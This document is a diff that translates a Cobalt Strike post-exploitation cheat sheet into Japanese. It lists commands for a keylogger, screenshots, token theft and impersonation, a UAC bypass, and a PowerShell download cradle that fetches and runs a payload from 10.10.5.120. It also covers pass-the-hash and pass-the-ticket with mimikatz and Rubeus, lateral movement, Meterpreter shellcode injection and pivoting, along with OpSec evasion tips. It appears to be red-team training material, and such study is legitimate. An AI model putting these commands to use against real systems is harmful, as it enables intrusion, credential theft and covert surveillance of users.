# Execute local .NET binary
+# ローカルの.NETバイナリの実行
execute-assembly </path/to/executable.exe>
-# Screenshots
-printscreen # Take a single screenshot via PrintScr method
-screenshot # Take a single screenshot
-screenwatch # Take periodic screenshots of desktop
-## Go to View -> Screenshots to see them
+# スクリーンショット
+printscreen # PrintScrメソッドを使用して単一のスクリーンショットを撮影する
+screenshot # 単一のスクリーンショットを撮影する
+screenwatch # デスクトップの定期的なスクリーンショットを撮影する
+## これらを表示するには、表示 -> スクリーンショットに移動します
-# keylogger
+# キーロガー
keylogger [pid] [x86|x64]
-## View > Keystrokes to see the keys pressed
+## キーストロークを表示するには、表示 > キーストロークに移動します
-# portscan
-portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Inject portscan action inside another process
+# ポートスキャン
+portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # 他のプロセス内でポートスキャンアクションをインジェクトする
portscan [targets] [ports] [arp|icmp|none] [max connections]
# Powershell
-# Import Powershell module
+# Powershellモジュールのインポート
powershell-import C:\path\to\PowerView.ps1
-powershell <just write powershell cmd here>
+powershell <ここにpowershellコマンドを記述>
-# User impersonation
-## Token generation with creds
-make_token [DOMAIN\user] [password] #Create token to impersonate a user in the network
-ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
-rev2self # Stop using token generated with make_token
-## The use of make_token generates event 4624: An account was successfully logged on. This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type. As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.
+# ユーザーのなりすまし
+## 資格情報を使用してトークンを生成
+make_token [DOMAIN\user] [password] # ネットワーク内のユーザーをなりすますためのトークンを作成
+ls \\computer_name\c$ # 生成されたトークンを使用してコンピューターのC$にアクセスしようとする
+rev2self # make_tokenで生成されたトークンの使用を停止する
+## make_tokenの使用により、イベント4624が生成されます。このイベントはWindowsドメインでは非常に一般的ですが、ログオンタイプでフィルタリングすることで絞り込むことができます。前述のように、LOGON32_LOGON_NEW_CREDENTIALSを使用しています。
-# UAC Bypass
-elevate svc-exe <listener>
-elevate uac-token-duplication <listener>
+# UACバイパス
+elevate svc-exe <リスナー>
+elevate uac-token-duplication <リスナー>
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
-## Steal token from pid
-## Like make_token but stealing the token from a process
-steal_token [pid] # Also, this is useful for network actions, not local actions
-## From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says Impersonated <current_username> - it's impersonating our own cloned token.
-ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
-rev2self # Stop using token from steal_token
+## pidからトークンを盗む
+## make_tokenと同様ですが、プロセスからトークンを盗みます
+steal_token [pid] # また、これはローカルアクションではなく、ネットワークアクションにも役立ちます
+## APIドキュメントからわかるように、このログオンタイプは「呼び出し元が現在のトークンをクローンできる」ことを意味します。これがBeaconの出力にImpersonated <current_username>と表示される理由です-自分自身のクローンされたトークンをなりすましています。
+ls \\computer_name\c$ # 生成されたトークンを使用してコンピューターのC$にアクセスしようとする
+rev2self # steal_tokenからのトークンの使用を停止する
-## Launch process with nwe credentials
-spawnas [domain\username] [password] [listener] #Do it from a directory with read access like: cd C:\
-## Like make_token, this will generate Windows event 4624: An account was successfully logged on but with a logon type of 2 (LOGON32_LOGON_INTERACTIVE). It will detail the calling user (TargetUserName) and the impersonated user (TargetOutboundUserName).
+## 新しい資格情報でプロセスを起動する
+spawnas [domain\username] [password] [listener] # 読み取りアクセスがあるディレクトリ(例:cd C:\)から実行します
+## make_tokenと同様に、これによりWindowsイベント4624が生成されます。ログオンタイプは2(LOGON32_LOGON_INTERACTIVE)です。呼び出し元のユーザー(TargetUserName)となりすましたユーザー(TargetOutboundUserName)が詳細に表示されます。
-## Inject into process
+## プロセスにインジェクトする
inject [pid] [x64|x86] [listener]
-## From an OpSec point of view: Don't perform cross-platform injection unless you really have to (e.g. x86 -> x64 or x64 -> x86).
+## OpSecの観点からは、本当に必要な場合以外はクロスプラットフォームのインジェクションを実行しないでください(例:x86 -> x64またはx64 -> x86)。
-## Pass the hash
-## This modification process requires patching of LSASS memory which is a high-risk action, requires local admin privileges and not all that viable if Protected Process Light (PPL) is enabled.
-pth [pid] [arch] [DOMAIN\user] [NTLM hash]
-pth [DOMAIN\user] [NTLM hash]
+## ハッシュの渡し
+## この変更プロセスでは、高リスクなアクションであるLSASSメモリのパッチが必要であり、ローカル管理者特権が必要であり、Protected Process Light(PPL)が有効になっている場合は実行できません。
+pth [pid] [arch] [DOMAIN\user] [NTLMハッシュ]
+pth [DOMAIN\user] [NTLMハッシュ]
-## Pass the hash through mimikatz
+## mimikatzを介したハッシュの渡し
mimikatz sekurlsa::pth /user:<username> /domain:<DOMAIN> /ntlm:<NTLM HASH> /run:"powershell -w hidden"
-## Withuot /run, mimikatz spawn a cmd.exe, if you are running as a user with Desktop, he will see the shell (if you are running as SYSTEM you are good to go)
-steal_token <pid> #Steal token from process created by mimikatz
+## /runがない場合、mimikatzはcmd.exeを生成します。デスクトップを実行しているユーザーはシェルを見ることができます(SYSTEMとして実行している場合は問題ありません)
+steal_token <pid> # mimikatzによって作成されたプロセスからトークンを盗む
-## Pass the ticket
-## Request a ticket
+## チケットの渡し
+## チケットの要求
execute-assembly C:\path\Rubeus.exe asktgt /user:<username> /domain:<domain> /aes256:<aes_keys> /nowrap /opsec
-## Create a new logon session to use with the new ticket (to not overwrite the compromised one)
+## 新しいチケットを使用するための新しいログオンセッションを作成する(侵害されたセッションを上書きしないようにするため)
make_token <domain>\<username> DummyPass
-## Write the ticket in the attacker machine from a poweshell session & load it
+## 攻撃者のマシンにチケットを書き込んでロードする
[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
-
-## Pass the ticket from SYSTEM
-## Generate a new process with the ticket
-execute-assembly C:\path\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:<AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
-## Steal the token from that process
+## SYSTEMからチケットを渡す
+## チケットを持つ新しいプロセスを生成する
+execute-assembly C:\path\Rubeus.exe asktgt /user:<ユーザー名> /domain:<ドメイン> /aes256:<AESキー> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
+## そのプロセスからトークンを盗む
steal_token <pid>
-## Extract ticket + Pass the ticket
-### List tickets
+## チケットの抽出 + チケットの渡し
+### チケットの一覧表示
execute-assembly C:\path\Rubeus.exe triage
-### Dump insteresting ticket by luid
+### LUIDによる興味深いチケットのダンプ
execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
-### Create new logon session, note luid and processid
+### 新しいログオンセッションを作成し、LUIDとプロセスIDをメモする
execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
-### Insert ticket in generate logon session
+### 生成されたログオンセッションにチケットを挿入する
execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
-### Finally, steal the token from that new process
+### 最後に、その新しいプロセスからトークンを盗む
steal_token <pid>
-# Lateral Movement
-## If a token was created it will be used
+# 横方向の移動
+## トークンが作成された場合は使用されます
jump [method] [target] [listener]
-## Methods:
-## psexec x86 Use a service to run a Service EXE artifact
-## psexec64 x64 Use a service to run a Service EXE artifact
-## psexec_psh x86 Use a service to run a PowerShell one-liner
-## winrm x86 Run a PowerShell script via WinRM
-## winrm64 x64 Run a PowerShell script via WinRM
+## メソッド:
+## psexec x86 サービスを使用してService EXEアーティファクトを実行する
+## psexec64 x64 サービスを使用してService EXEアーティファクトを実行する
+## psexec_psh x86 サービスを使用してPowerShellのワンライナーを実行する
+## winrm x86 WinRMを介してPowerShellスクリプトを実行する
+## winrm64 x64 WinRMを介してPowerShellスクリプトを実行する
remote-exec [method] [target] [command]
-## Methods:
-## psexec Remote execute via Service Control Manager
-## winrm Remote execute via WinRM (PowerShell)
-## wmi Remote execute via WMI
+## メソッド:
+## psexec サービス制御マネージャーを介してリモート実行する
+## winrm WinRMを介してリモート実行する(PowerShell)
+## wmi WMIを介してリモート実行する
-## To execute a beacon with wmi (it isn't ins the jump command) just upload the beacon and execute it
+## wmiでビーコンを実行するには(jumpコマンドには含まれていません)、ビーコンをアップロードして実行するだけです
beacon> upload C:\Payloads\beacon-smb.exe
beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe
-# Pass session to Metasploit - Through listener
-## On metaploit host
+# Metasploitにセッションを渡す - リスナーを介して
+## Metasploitホストで
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST eth0
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > exploit -j
-## On cobalt: Listeners > Add and set the Payload to Foreign HTTP. Set the Host to 10.10.5.120, the Port to 8080 and click Save.
+## Cobaltで: Listeners > Add として、PayloadをForeign HTTPに設定します。Hostを10.10.5.120、Portを8080に設定し、保存をクリックします。
beacon> spawn metasploit
-## You can only spawn x86 Meterpreter sessions with the foreign listener.
+## Foreignリスナーではx86 Meterpreterセッションのみを生成できます。
-# Pass session to Metasploit - Through shellcode injection
-## On metasploit host
+# Metasploitにセッションを渡す - シェルコードインジェクションを介して
+## Metasploitホストで
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<IP> LPORT=<PORT> -f raw -o /tmp/msf.bin
-## Run msfvenom and prepare the multi/handler listener
+## msfvenomを実行し、multi/handlerリスナーを準備します
-## Copy bin file to cobalt strike host
+## binファイルをCobalt Strikeホストにコピーします
ps
-shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process
+shinject <pid> x64 C:\Payloads\msf.bin #x64プロセスにMetasploitのシェルコードをインジェクトする
-# Pass metasploit session to cobalt strike
-## Fenerate stageless Beacon shellcode, go to Attacks > Packages > Windows Executable (S), select the desired listener, select Raw as the Output type and select Use x64 payload.
-## Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt srike shellcode
+# MetasploitセッションをCobalt Strikeに渡す
+## ステージレスのBeaconシェルコードを生成します。Attacks > Packages > Windows Executable (S)に移動し、希望するリスナーを選択し、出力タイプとしてRawを選択し、x64ペイロードを使用するように選択します。
+## Metasploitのpost/windows/manage/shellcode_injectを使用して生成されたCobalt Strikeのシェルコードをインジェクトします
-# Pivoting
-## Open a socks proxy in the teamserver
+# ピボット
+## チームサーバーでソックスプロキシを開く
beacon> socks 1080
-# SSH connection
-beacon> ssh 10.10.17.12:22 username password
+# SSH接続
+beacon> ssh 10.10.17.12:22 ユーザー名 パスワード
 (3) (3).png)
 (1) (2).png)
 (2).png)
 (1) (2) (4) (1).png)
 (2) (1).png)